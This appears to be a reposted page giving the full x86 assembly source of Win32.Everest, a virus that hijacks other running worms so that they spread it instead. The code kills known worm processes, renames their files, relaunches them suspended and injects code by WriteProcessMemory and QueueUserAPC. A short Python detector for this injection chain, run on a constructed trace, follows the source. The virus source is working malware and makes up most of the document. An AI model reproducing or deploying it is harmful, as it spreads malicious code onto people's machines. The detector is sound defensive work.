[Repost] The "spread a virus with a virus" idea and the Win32.Everest source code

Source: CVC

[code] Win32.Everest
 by pkxp/CVC
 
lemme introduce my Everest virus, the world's first virus 
which spreads via other viruses. The idea came to my head when 
I was thinking about viruses in 2003. The virus itself is not 
big, and it's not complicated; I coded it just to show something new.

Technical details:
1. find a known virus 
2. kill and move it
3. run it in suspend mode and hook its GetModuleFileNameA
4. resume it
5. if no more known viruses, continue, else jump 1 
6. read data from HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
7. repeat 1,2,3,4,5
8. sleep, then jump 1
So when those viruses spread, what they are spreading is my Everest instead!
 pkxp / CVC
 

.386 
.model flat,stdcall 
option casemap:none 
include useful.inc 

.code
main: 
 @pushsz 'Everest'
 push FALSE
 push NULL
 call CreateMutex
 call GetLastError 
 cmp eax , ERROR_ALREADY_EXISTS
 jz ExitVirus 
 call EverestInit 

PatchFixedVirus: 
 mov pMem , NULL 
 @pushsz '\'
 push offset szWinPath
 push offset FixedVirus
call PatchAllVirus
push 1000*60*30
call Sleep
PatchRegRunVirus:
 Invoke VirtualAlloc,0,4096,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE
 or eax , eax
 jz MainSleep 
 mov pMem , eax

 call ReadRunKey ;read data from run to pMem
 push NULL
 push NULL 
 push pMem 
 call PatchAllVirus ;no prefix
 
 push MEM_RELEASE 
 push 0 
 push pMem
 call VirtualFree 
MainSleep:
push 1000*60*15 
call Sleep
jmp PatchFixedVirus 
ExitVirus:
 push 1
 call ExitProcess

;--------------------------------------------------------------
EverestInit: 
 push MAX_PATH
push offset szWormPath 
push 0
call GetModuleFileNameA

push 50
push offset szWinPath 
call GetWindowsDirectoryA

push 50
push offset szSysPath 
call GetSystemDirectoryA
call RaisePrivileges 
call GetAPIz 
 ret
 
;---------------------------------------------------------------
PatchAllVirus PROC szVirusList : DWORD , szPrefix : DWORD , szPrefix2 : DWORD
 LOCAL hProcess : DWORD
 LOCAL szVirusPath[128] : BYTE
 LOCAL szformatedPath[128]: BYTE
 
 mov esi , szVirusList
 lea edi , szVirusPath
PAVLoop: 
 push esi
 push szPrefix2
 push szPrefix
 @pushsz '%s%s%s'
 push edi
 call wsprintf 
 add esp , 20 

 mov al , byte ptr[edi]
 or al , al
 jz PAVExit

 lea eax , szformatedPath
 push eax
 push edi
 call formatVirus
 
 lea eax , szformatedPath
 push eax 
 call OpenNT4_2k_xp_2003Virus
 mov hProcess , eax 
 
PAVNextName:
 lodsb
 or al , al
 jnz PAVNextName 
 mov eax , pMem
 .if eax == 0
 lodsd 
 .else 
 mov eax , offset PatchVirus
 .endif 

 push edi 
 push hProcess 
 call eax 
 
 mov al , byte ptr[esi]
 or al , al
 jnz PAVLoop 
PAVExit: 
 ret 12
PatchAllVirus ENDP 

;------------------------------------------------------------------
formatVirus PROC pVirusName:DWORD , pformatedName:DWORD
 pushad
 mov esi , pVirusName
 mov edi , pformatedName
FVCopy: 
 lodsb
 cmp al , ' '
 jz FVEndCopy
 or al , al
 jz FVEndCopy 
 stosb
 jmp FVCopy
FVEndCopy:
 xor al , al
 stosb
 popad
 ret 8
formatVirus ENDP 

;------------------------------------------------------------------ 
FixedVirus: 
 db 'system32\msblast.exe',0 ;msblast
 dd offset PatchVirus
 
 db 'Videodrv.exe',0 ;Mimail
 dd offset PatchVirus
 
 db 'system32\runouce.exe',0 ;ChineseHack
 dd offset PatchVirus
 
 db 'system32\gone.scr',0 
 dd offset PatchVirus
 
 db 'system32\hfind.exe',0 ;muma
 dd offset PatchVirus
 
 db 'system32\scam32.exe',0 ;sircam
 dd offset PatchVirus
 
 db 'killonce.exe',0 
 dd offset PatchVirus
 
 db 'system32\wins\DLLHOST.exe',0
 dd offset PatchVirus
 
 db 'system32\Ravmond.exe',0 ;Lovgate
 dd offset PatchVirus 
 db 'system32\WinGate.exe',0 
 dd offset PatchVirus 
 db 'system32\WinDriver.exe',0 
 dd offset PatchVirus 
 db 'system32\Winrpc.exe',0 
 dd offset PatchVirus 
 db 'system32\Winhelp.exe',0
 dd offset PatchVirus
 db 'system32\Iexplore.exe',0 
 dd offset PatchVirus 
 db 'system32\NetServices.exe',0
 dd offset PatchVirus 
 db 'system32\winexe.exe',0
 dd offset PatchVirus 
 
 db 'mmc.exe',0 ;nimda
 dd offset PatchVirus
 
 db 'system32\load.exe',0 
 dd offset PatchVirus
 
 db 'system32\wqk.exe',0 ;Klez
 dd offset PatchVirus
 db 'system32\krn132.exe',0
 dd offset PatchVirus 
 
 
 db 'ParticularViruses',0
 dd offset ParticularVirus
 db 0 ;End of virus list 
 
;-------------------------------------------------------------------
OpenNT4_2k_xp_2003Virus PROC szVirusName : DWORD
 LOCAL hProcess : DWORD
 LOCAL hMods : DWORD 
 LOCAL szProcessName[MAX_PATH] : BYTE 
 LOCAL ProcessIds[128+1] : DWORD
 
 pushad 
 push szVirusName 
 push offset szWormPath
 call lstrcmpi
 jz OVFailExit
 
 lea esi , ProcessIds 
 push (128+1)*4 
 push esi
call RtlZeroMemory 
push offset tmp
push 128*4 ;*4
push esi
 moveax,12345678h
_EnumProcesses = dword ptr $-4
call eax ;enumerate all running processes
dec eax
jne OVFailExit
add esi,4 ;esi->ProcessIDs[128]
ProcessSearch:
 lodsd ;get PID
 or eax , eax
 jz OVFailExit
 
 push eax 
 push FALSE
 push PROCESS_ALL_ACCESS
 call OpenProcess
 or eax , eax
 jz ProcessSearch 
 mov hProcess , eax

 lea eax , hMods 
 push offset tmp
 push 4
 push eax
 push hProcess
 mov eax , 12345678h
_EnumProcessModules = dword ptr $-4
 call eax 
 or eax , eax
 jz OVClose
 
 lea edi , szProcessName
 push MAX_PATH
 push edi
 push hMods
 push hProcess
 mov eax , 12345678h
_GetModuleFileNameEx = dword ptr $-4
 call eax 
 or eax , eax
 jz OVClose
 
IsVirus: 
 
 push szVirusName
 push edi 
 call lstrcmpi
 jz OVSucExit
OVClose: 
 push hProcess
 call CloseHandle 
 jmp ProcessSearch
 
OVFailExit: 
 popad
 xor eax , eax
 ret 4 
OVSucExit: 
 popad 
 mov eax , hProcess 
 ret 4
OpenNT4_2k_xp_2003Virus ENDP 

;---------------------------------------------------------------
PatchVirus PROC hProcess : DWORD , szVirusPath : DWORD
 LOCAL szDestPath[128] : BYTE
 LOCAL szformatedPath[128]: BYTE
 
 pushad 
 mov eax , hProcess
 or eax , eax
 jz PVMoveVirus 
 push 0
 push hProcess
 call TerminateProcess 
 push INFINITE
 push hProcess
 call WaitForSingleObject 
 
 push hProcess
 call CloseHandle 
PVMoveVirus: 
 lea esi , szformatedPath
 push esi
 push szVirusPath
 call formatVirus
 
 lea edi , szDestPath
 push esi
 push edi
 call lstrcpy

 @pushsz '.scr'
 push edi 
 call lstrcat
 
 push edi
 push esi
 call MoveFile 

 push esi
 call lstrlen 
 
 mov esi , szVirusPath
 add esi , eax 
 push esi
 push edi
 call lstrcat

 push edi
 call StartVirus
 popad
 ret 8
PatchVirus ENDP 

;-------------------------------------------------------------------
ParticularVirus:
 ret 8
 
;------------------------------------------------------------------- 
StartVirus PROC szVirusPath : DWORD 
 LOCAL sio : STARTUPINFO
LOCAL pi : PROCESS_INformATION
LOCAL cbWritten : DWORD

 pushad 
 push sizeof(STARTUPINFO)
 lea eax , sio
 push eax
 call RtlZeroMemory
 mov sio.cb , sizeof STARTUPINFO
 mov sio.wShowWindow , SW_HIDE
 mov sio.dwFlags , STARTF_USESHOWWINDOW
 
 lea eax , pi
 push eax
 lea eax , sio
 push eax
 push NULL 
 push NULL 
 push CREATE_SUSPENDED
 push TRUE
 push NULL 
 push NULL 
 push szVirusPath
 push NULL
 call CreateProcess
 or eax , eax
jzSVExit

 push 3000
 call Sleep
 
 pushPAGE_EXECUTE_READWRITE 
pushMEM_RESERVE or MEM_COMMIT
pushRemoteCodeEnd - RemoteCodeStart
push0
push pi.hProcess
call VirtualAllocEx 
or eax , eax
jzSVFail
mov esi , eax

add eax , NewGetModuleFileName - RemoteCodeStart
mov _NewGetModuleFileNameA , eax
 
 lea eax , cbWritten
 push eax
 push RemoteCodeEnd - RemoteCodeStart
 push offset RemoteCodeStart
 push esi 
 push pi.hProcess
 call WriteProcessMemory 
 or eax , eax
jzSVFail

 push NULL
 push pi.hThread
 push esi 
 call QueueUserAPC
 or eax , eax
jzSVFail
 
 push pi.hThread
 call ResumeThread 
SVFail:
 push pi.hThread
 call CloseHandle
 push pi.hProcess
 call CloseHandle
SVExit: 
 popad
 ret 4
StartVirus ENDP

;-----------------------------------------------------------------
RemoteCodeStart: 
 mov esi , 12345678h
_GetModuleFileNameA = dword ptr $-4 
 
 @pushsz '123' ;cbWriten 
 push PAGE_EXECUTE_READWRITE 
 push 6 ; push & ret
 push esi
 mov eax , 12345678h
_VirtualProtect = dword ptr $-4
 call eax
 
 @pushsz '123' ;cbWriten 
 push 6
 call RCSJump
 push 12345678h 
_NewGetModuleFileNameA = dword ptr $-4 
 ret
RCSJump:
 push esi
 push -1
 mov eax , 12345678h
_WriteProcessMemory = dword ptr $-4
 call eax 
 ret 4 

NewGetModuleFileName:
 push esi
 push edi
 mov edi , [esp+16]
 call _szWormPath
szWormPath db MAX_PATH dup (0)
_szWormPath: 
 pop esi 
 xor ecx , ecx
RCSLoop:
 lodsb
 stosb
 inc ecx 
 or al , al
 jnz RCSLoop 
 pop edi
 pop esi
 mov eax , ecx
 dec eax
 ret 12 
RemoteCodeEnd: 

;-----------------------------------------------------------------
GetAPIz:
 @pushsz 'Kernel32.dll'
 call GetModuleHandle
 xchg eax,esi 
 
 @pushsz 'GetModuleFileNameA'
 push esi
 call GetProcAddress
 mov _GetModuleFileNameA,eax 
 
 @pushsz 'VirtualProtect'
 push esi
 call GetProcAddress
 mov _VirtualProtect,eax 
 
 @pushsz 'WriteProcessMemory'
 push esi
 call GetProcAddress
 mov _WriteProcessMemory,eax

 @pushsz 'PSAPI'
 call LoadLibraryA
 xchg eax,esi

 @pushsz 'EnumProcesses'
 push esi
 call GetProcAddress
 mov _EnumProcesses,eax 
 
 @pushsz 'EnumProcessModules'
 push esi
 call GetProcAddress
 mov _EnumProcessModules,eax 

 @pushsz 'GetModuleFileNameExA'
 push esi
 call GetProcAddress
 mov _GetModuleFileNameEx,eax 
 ret 
 
;---------------Raise Privilege of our process----------------------
RaisePrivileges:
 call GetCurrentProcess
 push offset p_token
 push TOKEN_ALL_ACCESS ;DesiredAccess
 push eax 
 call OpenProcessToken ;open token of our process 
 or eax,eax ;God,I used cmp eax,eax first
 jz RPExit

 push offset p_luid 
 @pushsz 'SeDebugPrivilege'
 push NULL
 call LookupPrivilegevalueA ;find LUID for this priv.
 dec eax
 jne RPExit
 
 push 0
 call SetLastError
 push NULL
 push NULL
 push NULL
 push offset token_priv
 push FALSE
 push p_token
 call AdjustTokenPrivileges
RPExit: 
 ret
 token_priv dd 1
 p_luid db 8 dup(0)
 dd SE_PRIVILEGE_ENABLED
 p_token dd 0

;------------------------------------------------------------------- 
ReadRunKey PROC
 LOCAL hKey : DWORD
 LOCAL dwIndex : DWORD 
 LOCAL szFilePath[MAX_PATH] : BYTE
 LOCAL szvalueName[MAX_PATH] : BYTE
 LOCAL dwvalueLen : DWORD
 LOCAL dwDataLen : DWORD
 LOCAL dwType : DWORD
 
 pushad 
 lea eax , hKey
push eax
push KEY_QUERY_value ;KEY_ALL_ACCESS
push 0
 @pushsz 'Software\Microsoft\Windows\CurrentVersion\Run' 
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx
cmp eax , ERROR_SUCCESS
jnz RRKExit 

push 0
pop dwIndex
push pMem
pop edi

RRKLoop: 
push MAX_PATH
pop dwDataLen
push MAX_PATH
pop dwvalueLen
 lea eax , dwDataLen
 push eax 
 lea esi , szFilePath
 push esi
 lea eax , dwType
 push eax
 push NULL
 lea eax , dwvalueLen
 push eax 
 lea eax , szvalueName
 push eax 
 push dwIndex
 push hKey
 call RegEnumvalue
 cmp eax , ERROR_SUCCESS
 jnz RRKClose
 
 push edi 
 mov edi , esi
 push edi
 call lstrlen
 mov ecx , eax
 mov al , '\'
 repnz scasb
 pop edi
 jz RRRKReplace
 
 push esi
 @pushsz '\' 
 push offset szWinPath
 @pushsz '%s%s%s'
 push edi
 call wsprintf 
 add esp , 20 
 
 push edi
 call lstrlen 
 add edi , eax 
 xor al , al
 stosb
 
 push esi
 @pushsz '\' 
 push offset szSysPath
 @pushsz '%s%s%s'
 push edi
 call wsprintf 
 add esp , 20 
 jmp RRKNext 
 
RRRKReplace: 
 push esi 
 call ReplaceFilePath

 push esi 
 push edi
 call lstrcpy
RRKNext: 
 push edi
 call lstrlen 
 add edi , eax 
 xor al , al
 stosb
 inc dwIndex
 jmp RRKLoop 
RRKClose: 

 push hKey
 call RegCloseKey 
RRKExit: 
 xor al , al
 stosb 
 popad 
 ret
ReadRunKey ENDP

;------------------------------------------------------------------
ReplaceFilePath PROC szFilePath : DWORD
 LOCAL s[MAX_PATH] : BYTE 
 pushad 
 push szFilePath
 lea edi , s
 push edi
 call lstrcpy 
IsSysDir: 
 push 8
 pop ecx
 @pushsz '%system%' ;len=8
 pop esi
 repz cmpsb
 jne IsWinDir
 
 push offset szSysPath
 push szFilePath
 call lstrcpy 
 jmp RFPCat
IsWinDir: 
 push 8
 pop ecx
 @pushsz '%windir%' ;len=8
 pop esi
 lea edi , s 
 repz cmpsb
 jne RFPExit
 
 push offset szWinPath
 push szFilePath
 call lstrcpy 
RFPCat: 
 push edi
 push szFilePath
 call lstrcat 
RFPExit: 
 popad
 ret 4
ReplaceFilePath ENDP 

Signature db 'Win32.Everest by PKXP/CVC, made in China.',0
szWinPath db 50 dup (0)
szSysPath db 50 dup (0)
tmp dd ? 
pMem dd 0

VEnd: 
end main
[/code]
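Steps 3 and 4 of the author's list are what StartVirus implements: the target is started with CREATE_SUSPENDED, an executable region is allocated in it with VirtualAllocEx, code is written with WriteProcessMemory, QueueUserAPC points the suspended main thread at that region, and ResumeThread lets it run. From a defender's side that five-call sequence against one child is the thing worth alerting on. The following Python is an added example, not code from the post or from CVC: it parses a simple API trace and reports every suspended child that received the full chain. The trace format ("<pid> <api>(k=v, ...) -> <result>") and the log lines are constructed for this demo and stand in for whatever a sandbox or EDR actually emits; the hook-by-APC match is done on "pfnAPC lies inside the RWX region", so it also catches variants whose APC routine is not at the start of the allocation.

```python
import re

CREATE_SUSPENDED = 0x4            # dwCreationFlags bit used by StartVirus
PAGE_EXECUTE_READWRITE = 0x40     # flProtect value used by StartVirus
FULL_CHAIN = ["CREATE_SUSPENDED", "ALLOC_RWX", "WRITE_RWX", "QUEUE_APC", "RESUME"]

# Constructed sample trace (hypothetical format, not real tool output).
# pid 1000 performs the Everest-style chain; pid 3000 is a benign control case.
TRACE = """\
1000 CreateProcessA(lpApplicationName="C:\\WINDOWS\\system32\\msblast.exe.scr", dwCreationFlags=0x4) -> hProcess=0x5c pid=2044 tid=2048
1000 Sleep(dwMilliseconds=3000) -> 0
1000 VirtualAllocEx(hProcess=0x5c, dwSize=0x8c, flAllocationType=0x3000, flProtect=0x40) -> 0x350000
1000 WriteProcessMemory(hProcess=0x5c, lpBaseAddress=0x350000, nSize=0x8c) -> 1
1000 QueueUserAPC(pfnAPC=0x350000, hThread=0x60) -> 1
1000 ResumeThread(hThread=0x60) -> 0
3000 CreateProcessA(lpApplicationName="C:\\WINDOWS\\notepad.exe", dwCreationFlags=0x0) -> hProcess=0x70 pid=3100 tid=3104
3000 WriteProcessMemory(hProcess=0x70, lpBaseAddress=0x400000, nSize=0x4) -> 1
"""

LINE_RE = re.compile(r"^(\d+) (\w+)\((.*)\) -> (.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|[^,\s]+)')


def parse_line(line):
    """Split one trace line into pid, API name, argument dict and result."""
    m = LINE_RE.match(line)
    if not m:
        return None
    pid, api, args, result = m.groups()
    return {
        "pid": int(pid),
        "api": api,
        "args": {k: v.strip('"') for k, v in KV_RE.findall(args)},
        "result": {k: v.strip('"') for k, v in KV_RE.findall(result)},
        "raw_result": result.strip(),
    }


def to_int(s):
    return int(s, 0)   # accepts "0x40" and "4"


def in_region(addr, region):
    lo, hi = region
    return lo <= addr < hi


def mark(state, stage):
    if stage not in state["stages"]:
        state["stages"].append(stage)


def detect_apc_injection(trace):
    """Return one finding per child that was created suspended and then received
    the alloc-RWX / write / QueueUserAPC / ResumeThread chain from its parent."""
    pending = {}    # (parent pid, hProcess) -> state of a suspended child
    findings = []
    for raw in trace.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        pid, api, a = ev["pid"], ev["api"], ev["args"]
        if api.startswith("CreateProcess"):
            if to_int(a.get("dwCreationFlags", "0")) & CREATE_SUSPENDED:
                pending[(pid, ev["result"].get("hProcess"))] = {
                    "image": a.get("lpApplicationName"),
                    "child_pid": int(ev["result"].get("pid", "0")),
                    "stages": ["CREATE_SUSPENDED"], "rwx": None, "hThread": None}
            continue
        st = pending.get((pid, a.get("hProcess")))
        if api == "VirtualAllocEx" and st and to_int(a["flProtect"]) == PAGE_EXECUTE_READWRITE:
            base = to_int(ev["raw_result"])
            st["rwx"] = (base, base + to_int(a["dwSize"]))
            mark(st, "ALLOC_RWX")
        elif api == "WriteProcessMemory" and st and st["rwx"] and in_region(to_int(a["lpBaseAddress"]), st["rwx"]):
            mark(st, "WRITE_RWX")
        elif api == "QueueUserAPC":
            # No hProcess argument: match the APC routine address against every
            # RWX region this parent allocated in one of its suspended children.
            for (ppid, _), s in pending.items():
                if ppid == pid and s["rwx"] and in_region(to_int(a["pfnAPC"]), s["rwx"]):
                    mark(s, "QUEUE_APC")
                    s["hThread"] = a["hThread"]
        elif api == "ResumeThread":
            for key, s in list(pending.items()):
                if key[0] == pid and s["hThread"] == a["hThread"]:
                    mark(s, "RESUME")
                    if s["stages"] == FULL_CHAIN:
                        findings.append({"parent_pid": pid, "child_pid": s["child_pid"],
                                         "image": s["image"], "stages": s["stages"]})
                    del pending[key]
    return findings


if __name__ == "__main__":
    for f in detect_apc_injection(TRACE):
        print(f"parent {f['parent_pid']} injected into suspended child {f['child_pid']} ({f['image']}): {' -> '.join(f['stages'])}")
```

The detector deliberately keys on the combination rather than on any single call: WriteProcessMemory into a child on its own (the pid 3000 case) is what debuggers and installers do, and a suspended start on its own is common too. Requiring the RWX allocation, a write into it, an APC whose routine lies inside it, and the resume of that same thread keeps the rule specific to this injection pattern.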